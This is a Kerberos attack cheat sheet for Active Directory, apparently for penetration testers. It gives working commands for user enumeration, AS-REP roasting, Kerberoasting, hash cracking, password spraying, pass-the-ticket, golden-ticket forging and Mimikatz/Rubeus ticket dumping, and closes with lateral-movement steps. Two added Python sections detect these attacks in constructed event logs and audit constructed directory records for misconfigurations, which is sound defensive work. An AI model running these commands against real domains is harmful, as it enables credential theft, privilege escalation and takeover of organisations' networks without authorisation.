Kerberos Authentication Service
Environment Variables / Setup
export IP=
export DOMAIN=domain.local
export DC_IP=$IP
Phase 1: Kerberos Service Discovery
Nmap Kerberos Scripts
nmap -p 88 --script=krb5-enum-users,krb5-realm $IP
Service Detection
# Check for Kerberos service
nmap -sU -sS -p 88 $IP
telnet $IP 88
Phase 2: User Enumeration
Kerberos Username Enumeration
# Using netexec
netexec smb $IP -u '' -p '' --users
# Using enum4linux-ng
enum4linux-ng -A $IP
# Using rpcclient
rpcclient -U "" -N $IP
enumdomusers
exit
Kerberos User Enumeration (Direct)
# Using kerbrute
./kerbrute userenum -d $DOMAIN --dc $DC_IP /usr/share/wordlists/seclists/Usernames/Names/names.txt
# Using nmap script
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$DOMAIN" $IP   # double quotes so $DOMAIN expands
Phase 3: ASREPRoast Attack
Check for ASREPRoastable Users
Users with “Do not require Kerberos preauthentication” enabled:
# Using impacket-GetNPUsers
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
# Using impacket with specific user
impacket-GetNPUsers $DOMAIN/guest -dc-ip $DC_IP -no-pass
# Using netexec
netexec ldap $IP -u users.txt -p '' --asreproast asrep_hashes.txt
Crack ASREPRoast Hashes
# Save hashes to file, then crack with hashcat
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
# Or with john
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
Phase 4: Kerberoasting Attack
Find Service Principal Names (SPNs)
# Using impacket-GetUserSPNs (requires valid creds)
impacket-GetUserSPNs $DOMAIN/username:password -dc-ip $DC_IP -request -outputfile kerberoast_hashes.txt
# Using netexec (requires valid creds)
netexec ldap $IP -u username -p password --kerberoasting kerberoast_hashes.txt
# Alternative: Using ldapsearch if LDAP accessible
# Base DN is the domain split into dc= components (domain.local -> dc=domain,dc=local), not $DOMAIN verbatim
BASE_DN="dc=$(echo "$DOMAIN" | sed 's/\./,dc=/g')"
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "$BASE_DN" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName
Crack Kerberoast Hashes
# Crack TGS hashes with hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# Or with john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
Phase 5: Password Spraying
Kerberos Password Spraying
# Using netexec
netexec smb $IP -u users.txt -p 'Password123!' --continue-on-success
# Using kerbrute
./kerbrute passwordspray -d $DOMAIN --dc $DC_IP users.txt 'Password123!'
# Common passwords to try:
# Password123!, Welcome123!, Summer2024!, Company2024!
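Added defender-side example, not part of the original cheat sheet: Phases 3, 4 and 5 each leave a distinct trace in the domain controller's Security log (4768 AS-REQ, 4769 TGS-REQ, 4771 pre-authentication failure). The records below are constructed to mirror those events' fields; field names, sample values and thresholds are assumptions of this example.

```python
"""Detection logic for AS-REP roasting, Kerberoasting and password spraying,
run over constructed Windows Security event records (not real log data)."""
from collections import defaultdict

RC4_HMAC = "0x17"  # ticket encryption type both roasting attacks ask for

# Constructed sample events; keys mirror 4768/4769/4771 fields
EVENTS = [
    {"id": 4768, "user": "svc_backup", "ip": "10.0.0.50", "etype": "0x17", "preauth": "0"},
    {"id": 4768, "user": "alice", "ip": "10.0.0.20", "etype": "0x12", "preauth": "2"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.50", "etype": "0x17", "service": "svc_sql"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.50", "etype": "0x17", "service": "svc_web"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.50", "etype": "0x17", "service": "svc_backup"},
    {"id": 4769, "user": "bob", "ip": "10.0.0.21", "etype": "0x12", "service": "WS01$"},
    *[{"id": 4771, "user": u, "ip": "10.0.0.50", "status": "0x18"}
      for u in ("alice", "bob", "carol", "dave", "erin", "frank")],
    {"id": 4771, "user": "bob", "ip": "10.0.0.21", "status": "0x18"},
]


def asrep_roast_candidates(events):
    """4768 with Pre-Authentication Type 0 and an RC4 ticket: an AS-REP was
    handed out without pre-auth, i.e. the account is being AS-REP roasted."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["preauth"] == "0" and e["etype"] == RC4_HMAC})


def kerberoast_sources(events, min_services=3):
    """One requester pulling RC4 service tickets for several non-machine
    accounts (machine SPNs end in '$' and are rarely crackable)."""
    seen = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and not e["service"].endswith("$"):
            seen[(e["user"], e["ip"])].add(e["service"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}


def spray_sources(events, min_accounts=5):
    """4771 with failure code 0x18 (KDC_ERR_PREAUTH_FAILED, wrong password)
    spread across many distinct accounts from a single source address."""
    failed = defaultdict(set)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            failed[e["ip"]].add(e["user"])
    return {ip: len(users) for ip, users in failed.items() if len(users) >= min_accounts}


if __name__ == "__main__":
    print("AS-REP roast:", asrep_roast_candidates(EVENTS))
    print("Kerberoast:", kerberoast_sources(EVENTS))
    print("Spray:", spray_sources(EVENTS))
```

Enabling AES-only on service accounts and requiring pre-authentication everywhere removes the RC4 and no-preauth signals these rules rely on, which is also the fix.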
Phase 6: Advanced Kerberos Attacks
Overpass-the-Hash (if NTLM hash available)
# Using impacket-getTGT
impacket-getTGT $DOMAIN/username -hashes :ntlm_hash
# Set environment variable
export KRB5CCNAME=username.ccache
# Use ticket for other attacks
impacket-psexec $DOMAIN/username@target -k -no-pass
Pass-the-Ticket (if TGT/TGS available)
# Import ticket
export KRB5CCNAME=ticket.ccache
# Use ticket
impacket-psexec $DOMAIN/username@target -k -no-pass
Golden Ticket Attack (if krbtgt hash obtained)
# Create golden ticket (a forged TGT; requires the krbtgt hash and the domain SID)
# Note: adding -spn makes ticketer forge a service ticket (silver ticket) instead of a TGT
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid username
# Use golden ticket
export KRB5CCNAME=username.ccache
impacket-psexec $DOMAIN/username@target -k -no-pass
Phase 7: Kerberos Vulnerabilities
Check for Kerberoast Vulnerabilities
Look for:
- Service accounts with weak passwords
- High-privilege service accounts (Domain Admins)
- Unconstrained delegation settings
- Constrained delegation misconfigurations
Check for ASREPRoast Vulnerabilities
Look for:
- Users with “Do not require Kerberos preauthentication”
- Service accounts with this setting
- Inactive accounts with this misconfiguration
Phase 8: Post-Exploitation Kerberos
Extract Tickets from Memory (if admin access)
# Using Mimikatz on target
sekurlsa::tickets /export
# Using Rubeus on target
Rubeus.exe dump
# Transfer tickets back to attacker machine
Ticket Manipulation
# Convert tickets between formats
impacket-ticketConverter ticket.kirbi ticket.ccache
# Renew TGT
impacket-renewTGT $DOMAIN/username -k -ccache ticket.ccache
Tools & Techniques Summary
Enumeration Tools
nmap, kerbrute, enum4linux-ng, rpcclient, netexec
Attack Tools
impacket suite (GetNPUsers, GetUserSPNs, getTGT)
hashcat, john (hash cracking)
netexec (various Kerberos attacks)
Windows Tools (for target)
Rubeus.exe (comprehensive Kerberos toolkit)
Mimikatz (ticket extraction)
Kerberos Attack Checklist
- User enumeration via multiple methods
- ASREPRoast for users without preauth
- Password spraying with common passwords
- Kerberoasting for service accounts (requires creds)
- Hash cracking for obtained hashes
- Ticket attacks if hashes/tickets obtained
- Delegation abuse checks
- Post-exploitation ticket extraction
Common Kerberos Misconfigurations
- Users with “Do not require Kerberos preauthentication”
- Service accounts with weak passwords
- Unconstrained delegation on computers
- Constrained delegation misconfigurations
- Weak encryption types (RC4) enabled
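Added example, not from the original page: an audit over constructed LDAP-style records that flags the misconfigurations listed in Phase 7 and in the list above (no-preauth accounts, SPNs on user and privileged accounts, unconstrained and constrained delegation, RC4 still allowed). Field names and sample values are assumptions; a real run would fill the records from an LDAP query.

```python
"""Audit of the Kerberos misconfigurations listed above, over constructed
records shaped like an LDAP export of AD objects (sample data, not live)."""

# userAccountControl bits (MS-SAMR) and msDS-SupportedEncryptionTypes bits
ACCOUNTDISABLE, TRUSTED_FOR_DELEGATION, DONT_REQ_PREAUTH = 0x2, 0x80000, 0x400000
RC4_HMAC = 0x4          # 0x8 = AES128, 0x10 = AES256
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample objects (0x200 NORMAL_ACCOUNT, 0x1000 WORKSTATION_TRUST_ACCOUNT)
OBJECTS = [
    {"sam": "svc_sql", "uac": 0x10200, "spn": ["MSSQLSvc/sql01:1433"],
     "memberOf": ["Domain Admins"], "enctypes": RC4_HMAC, "delegateTo": []},
    {"sam": "svc_web", "uac": 0x10200 | DONT_REQ_PREAUTH, "spn": ["HTTP/web01"],
     "memberOf": [], "enctypes": 0x18, "delegateTo": []},
    {"sam": "old_user", "uac": 0x200 | ACCOUNTDISABLE | DONT_REQ_PREAUTH, "spn": [],
     "memberOf": [], "enctypes": 0, "delegateTo": []},
    {"sam": "FS01$", "uac": 0x1000 | TRUSTED_FOR_DELEGATION, "spn": ["cifs/fs01"],
     "memberOf": [], "enctypes": 0x1c, "delegateTo": []},
    {"sam": "WEB02$", "uac": 0x1000, "spn": ["HTTP/web02"],
     "memberOf": [], "enctypes": 0x18, "delegateTo": ["cifs/DC01"]},
    {"sam": "alice", "uac": 0x200, "spn": [], "memberOf": [], "enctypes": 0x18, "delegateTo": []},
]


def audit_object(o):
    """Return the list of findings for one user/computer object (empty if clean)."""
    issues, is_computer = [], o["sam"].endswith("$")
    if o["uac"] & DONT_REQ_PREAUTH:
        issues.append("no-preauth (AS-REP roastable)")
        if o["uac"] & ACCOUNTDISABLE:
            issues.append("no-preauth on disabled account")
    if o["spn"] and not is_computer:
        issues.append("user SPN (Kerberoastable)")
        if set(o["memberOf"]) & PRIVILEGED_GROUPS:
            issues.append("privileged service account")
    if o["uac"] & TRUSTED_FOR_DELEGATION:
        issues.append("unconstrained delegation")
    if o["delegateTo"]:
        issues.append("constrained delegation -> " + ",".join(o["delegateTo"]))
    # Unset attribute (0): the KDC may still issue RC4 tickets for this principal
    if o["enctypes"] == 0 or o["enctypes"] & RC4_HMAC:
        issues.append("RC4 allowed")
    return issues


def audit(objects):
    """Map sAMAccountName -> findings for every object with at least one issue."""
    return {o["sam"]: audit_object(o) for o in objects if audit_object(o)}


if __name__ == "__main__":
    for sam, issues in audit(OBJECTS).items():
        print(f"{sam}: {'; '.join(issues)}")
```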
Next Steps
Once Kerberos attacks succeed:
- Use obtained credentials for lateral movement
- Check for delegation opportunities
- Extract additional tickets from compromised systems
- Escalate privileges using domain credentials